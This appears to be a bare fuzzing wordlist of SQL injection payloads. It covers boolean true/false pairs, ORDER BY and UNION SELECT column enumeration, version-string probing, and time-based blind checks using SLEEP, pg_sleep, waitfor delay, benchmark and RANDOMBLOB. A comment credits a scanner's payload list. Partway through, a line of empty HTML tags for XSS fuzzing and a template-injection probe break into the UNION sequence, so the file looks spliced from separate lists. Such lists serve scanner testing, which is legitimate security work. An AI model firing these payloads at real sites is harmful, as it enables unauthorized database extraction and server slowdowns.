HAVING 1=1 | |
HAVING 1=0 | |
HAVING 1=1# | |
HAVING 1=0# | |
HAVING 1=1-- | |
HAVING 1=0-- | |
AND 1=1 | |
AND 1=0 | |
AND 1=1-- | |
AND 1=0-- | |
AND 1=1# | |
AND 1=0# | |
AND 1=1 AND '%'=' | |
AND 1=0 AND '%'=' | |
AND 1083=1083 AND (1427=1427 | |
AND 7506=9091 AND (5913=5913 | |
AND 1083=1083 AND ('1427=1427 | |
AND 7506=9091 AND ('5913=5913 | |
AND 7300=7300 AND 'pKlZ'='pKlZ | |
AND 7300=7300 AND 'pKlZ'='pKlY | |
AND 7300=7300 AND ('pKlZ'='pKlZ | |
AND 7300=7300 AND ('pKlZ'='pKlY | |
AS INJECTX WHERE 1=1 AND 1=1 | |
AS INJECTX WHERE 1=1 AND 1=0 | |
AS INJECTX WHERE 1=1 AND 1=1# | |
AS INJECTX WHERE 1=1 AND 1=0# | |
AS INJECTX WHERE 1=1 AND 1=1-- | |
AS INJECTX WHERE 1=1 AND 1=0-- | |
WHERE 1=1 AND 1=1 | |
WHERE 1=1 AND 1=0 | |
WHERE 1=1 AND 1=1# | |
WHERE 1=1 AND 1=0# | |
WHERE 1=1 AND 1=1-- | |
WHERE 1=1 AND 1=0-- | |
ORDER BY 1-- | |
ORDER BY 2-- | |
ORDER BY 3-- | |
ORDER BY 4-- | |
ORDER BY 5-- | |
ORDER BY 6-- | |
ORDER BY 7-- | |
ORDER BY 8-- | |
ORDER BY 9-- | |
ORDER BY 10-- | |
ORDER BY 11-- | |
ORDER BY 12-- | |
ORDER BY 13-- | |
ORDER BY 14-- | |
ORDER BY 15-- | |
ORDER BY 16-- | |
ORDER BY 17-- | |
ORDER BY 18-- | |
ORDER BY 19-- | |
ORDER BY 20-- | |
ORDER BY 21-- | |
ORDER BY 22-- | |
ORDER BY 23-- | |
ORDER BY 24-- | |
ORDER BY 25-- | |
ORDER BY 26-- | |
ORDER BY 27-- | |
ORDER BY 28-- | |
ORDER BY 29-- | |
ORDER BY 30-- | |
ORDER BY 31337-- | |
ORDER BY 1# | |
ORDER BY 2# | |
ORDER BY 3# | |
ORDER BY 4# | |
ORDER BY 5# | |
ORDER BY 6# | |
ORDER BY 7# | |
ORDER BY 8# | |
ORDER BY 9# | |
ORDER BY 10# | |
ORDER BY 11# | |
ORDER BY 12# | |
ORDER BY 13# | |
ORDER BY 14# | |
ORDER BY 15# | |
ORDER BY 16# | |
ORDER BY 17# | |
ORDER BY 18# | |
ORDER BY 19# | |
ORDER BY 20# | |
ORDER BY 21# | |
ORDER BY 22# | |
ORDER BY 23# | |
ORDER BY 24# | |
ORDER BY 25# | |
ORDER BY 26# | |
ORDER BY 27# | |
ORDER BY 28# | |
ORDER BY 29# | |
ORDER BY 30# | |
ORDER BY 31337# | |
ORDER BY 1 | |
ORDER BY 2 | |
ORDER BY 3 | |
ORDER BY 4 | |
ORDER BY 5 | |
ORDER BY 6 | |
ORDER BY 7 | |
ORDER BY 8 | |
ORDER BY 9 | |
ORDER BY 10 | |
ORDER BY 11 | |
ORDER BY 12 | |
ORDER BY 13 | |
ORDER BY 14 | |
ORDER BY 15 | |
ORDER BY 16 | |
ORDER BY 17 | |
ORDER BY 18 | |
ORDER BY 19 | |
ORDER BY 20 | |
ORDER BY 21 | |
ORDER BY 22 | |
ORDER BY 23 | |
ORDER BY 24 | |
ORDER BY 25 | |
ORDER BY 26 | |
ORDER BY 27 | |
ORDER BY 28 | |
ORDER BY 29 | |
ORDER BY 30 | |
ORDER BY 31337 | |
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' | |
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' | |
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- | |
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- | |
%' AND 8310=8310 AND '%'=' | |
%' AND 8310=8311 AND '%'=' | |
and (select substring(@@version,1,1))='X' | |
and (select substring(@@version,1,1))='M' | |
and (select substring(@@version,2,1))='i' | |
and (select substring(@@version,2,1))='y' | |
and (select substring(@@version,3,1))='c' | |
and (select substring(@@version,3,1))='S' | |
and (select substring(@@version,3,1))='X' | |
# Source: Wapiti scanner payload list (time-delay SQL injection checks) | |
sleep(5)# | |
1 or sleep(5)# | |
" or sleep(5)# | |
' or sleep(5)# | |
" or sleep(5)=" | |
' or sleep(5)=' | |
1) or sleep(5)# | |
") or sleep(5)=" | |
') or sleep(5)=' | |
1)) or sleep(5)# | |
")) or sleep(5)=" | |
')) or sleep(5)=' | |
;waitfor delay '0:0:5'-- | |
);waitfor delay '0:0:5'-- | |
';waitfor delay '0:0:5'-- | |
";waitfor delay '0:0:5'-- | |
');waitfor delay '0:0:5'-- | |
");waitfor delay '0:0:5'-- | |
));waitfor delay '0:0:5'-- | |
'));waitfor delay '0:0:5'-- | |
"));waitfor delay '0:0:5'-- | |
benchmark(10000000,MD5(1))# | |
1 or benchmark(10000000,MD5(1))# | |
" or benchmark(10000000,MD5(1))# | |
' or benchmark(10000000,MD5(1))# | |
1) or benchmark(10000000,MD5(1))# | |
") or benchmark(10000000,MD5(1))# | |
') or benchmark(10000000,MD5(1))# | |
1)) or benchmark(10000000,MD5(1))# | |
")) or benchmark(10000000,MD5(1))# | |
')) or benchmark(10000000,MD5(1))# | |
pg_sleep(5)-- | |
1 or pg_sleep(5)-- | |
" or pg_sleep(5)-- | |
' or pg_sleep(5)-- | |
1) or pg_sleep(5)-- | |
") or pg_sleep(5)-- | |
') or pg_sleep(5)-- | |
1)) or pg_sleep(5)-- | |
")) or pg_sleep(5)-- | |
')) or pg_sleep(5)-- | |
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe | |
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' | |
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) | |
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- | |
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# | |
SLEEP(5)# | |
SLEEP(5)-- | |
SLEEP(5)=" | |
SLEEP(5)=' | |
or SLEEP(5) | |
or SLEEP(5)# | |
or SLEEP(5)-- | |
or SLEEP(5)=" | |
or SLEEP(5)=' | |
waitfor delay '00:00:05' | |
waitfor delay '00:00:05'-- | |
waitfor delay '00:00:05'# | |
benchmark(50000000,MD5(1)) | |
benchmark(50000000,MD5(1))-- | |
benchmark(50000000,MD5(1))# | |
or benchmark(50000000,MD5(1)) | |
or benchmark(50000000,MD5(1))-- | |
or benchmark(50000000,MD5(1))# | |
pg_SLEEP(5) | |
pg_SLEEP(5)-- | |
pg_SLEEP(5)# | |
or pg_SLEEP(5) | |
or pg_SLEEP(5)-- | |
or pg_SLEEP(5)# | |
'\" | |
AnD SLEEP(5) | |
AnD SLEEP(5)-- | |
AnD SLEEP(5)# | |
&&SLEEP(5) | |
&&SLEEP(5)-- | |
&&SLEEP(5)# | |
' AnD SLEEP(5) ANd '1 | |
'&&SLEEP(5)&&'1 | |
ORDER BY SLEEP(5) | |
ORDER BY SLEEP(5)-- | |
ORDER BY SLEEP(5)# | |
(SELECT * FROM (SELECT(SLEEP(5)))ecMj) | |
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)# | |
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- | |
+benchmark(3200,SHA1(1))+' | |
+ SLEEP(10) + ' | |
RANDOMBLOB(500000000/2) | |
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) | |
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) | |
RANDOMBLOB(1000000000/2) | |
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) | |
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) | |
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ | |
ORDER BY SLEEP(5) | |
ORDER BY 1,SLEEP(5) | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')) | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
${{<%[%'"}}%\. | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
ORDER BY SLEEP(5)# | |
ORDER BY 1,SLEEP(5)# | |
ORDER BY 1,SLEEP(5),3# | |
ORDER BY 1,SLEEP(5),3,4# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
ORDER BY SLEEP(5)-- | |
ORDER BY 1,SLEEP(5)-- | |
ORDER BY 1,SLEEP(5),3-- | |
ORDER BY 1,SLEEP(5),3,4-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- | |
UNION ALL SELECT 1 | |
UNION ALL SELECT 1,2 | |
UNION ALL SELECT 1,2,3 | |
UNION ALL SELECT 1,2,3,4 | |
UNION ALL SELECT 1,2,3,4,5 | |
UNION ALL SELECT 1,2,3,4,5,6 | |
UNION ALL SELECT 1,2,3,4,5,6,7 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
UNION ALL SELECT 1# | |
UNION ALL SELECT 1,2# | |
UNION ALL SELECT 1,2,3# | |
UNION ALL SELECT 1,2,3,4# | |
UNION ALL SELECT 1,2,3,4,5# | |
UNION ALL SELECT 1,2,3,4,5,6# | |
UNION ALL SELECT 1,2,3,4,5,6,7# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
<a></a><a2></a2><abbr></abbr><acronym></acronym><address></address><animate></animate><animatemotion></animatemotion><animatetransform></animatetransform><applet></applet><area></area><article></article><aside></aside><audio></audio><audio2></audio2><b></b><base></base><basefont></basefont><bdi></bdi><bdo></bdo><bgsound></bgsound><big></big><blink></blink><blockquote></blockquote><body></body><br></br><button></button><canvas></canvas><caption></caption><center></center><cite></cite><code></code><col></col><colgroup></colgroup><command></command><content></content><custom tags></custom tags><data></data><datalist></datalist><dd></dd><del></del><details></details><dfn></dfn><dialog></dialog><dir></dir><div></div><dl></dl><dt></dt><element></element><em></em><embed></embed><fieldset></fieldset><figcaption></figcaption><figure></figure><font></font><footer></footer><form></form><frame></frame><frameset></frameset><h1></h1><head></head><header></header><hgroup></hgroup><hr></hr><html></html><i></i><iframe></iframe><iframe2></iframe2><image></image><image2></image2><image3></image3><img></img><img2></img2><input></input><input2></input2><input3></input3><input4></input4><ins></ins><isindex></isindex><kbd></kbd><keygen></keygen><label></label><legend></legend><li></li><link></link><listing></listing><main></main><map></map><mark></mark><marquee></marquee><menu></menu><menuitem></menuitem><meta></meta><meter></meter><multicol></multicol><nav></nav><nextid></nextid><nobr></nobr><noembed></noembed><noframes></noframes><noscript></noscript><object></object><ol></ol><optgroup></optgroup><option></option><output></output><p></p><param></param><picture></picture><plaintext></plaintext><pre></pre><progress></progress><q></q><rb></rb><rp></rp><rt></rt><rtc></rtc><ruby></ruby><s></s><samp></samp><script></script><section></section><select></select><set></set><shadow></shadow><slot></slot><small></small><source></source><spacer></spacer><span></span><strike></strike><strong></strong
><style></style><sub></sub><summary></summary><sup></sup><svg></svg><table></table><tbody></tbody><td></td><template></template><textarea></textarea><tfoot></tfoot><th></th><thead></thead><time></time><title></title><tr></tr><track></track><tt></tt><u></u><ul></ul><var></var><video></video><video2></video2><wbr></wbr><xmp></xmp> | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
UNION ALL SELECT 1-- | |
UNION ALL SELECT 1,2-- | |
UNION ALL SELECT 1,2,3-- | |
UNION ALL SELECT 1,2,3,4-- | |
UNION ALL SELECT 1,2,3,4,5-- | |
UNION ALL SELECT 1,2,3,4,5,6-- | |
UNION ALL SELECT 1,2,3,4,5,6,7-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- | |
UNION SELECT @@VERSION,SLEEP(5),3 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),4 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7 | |
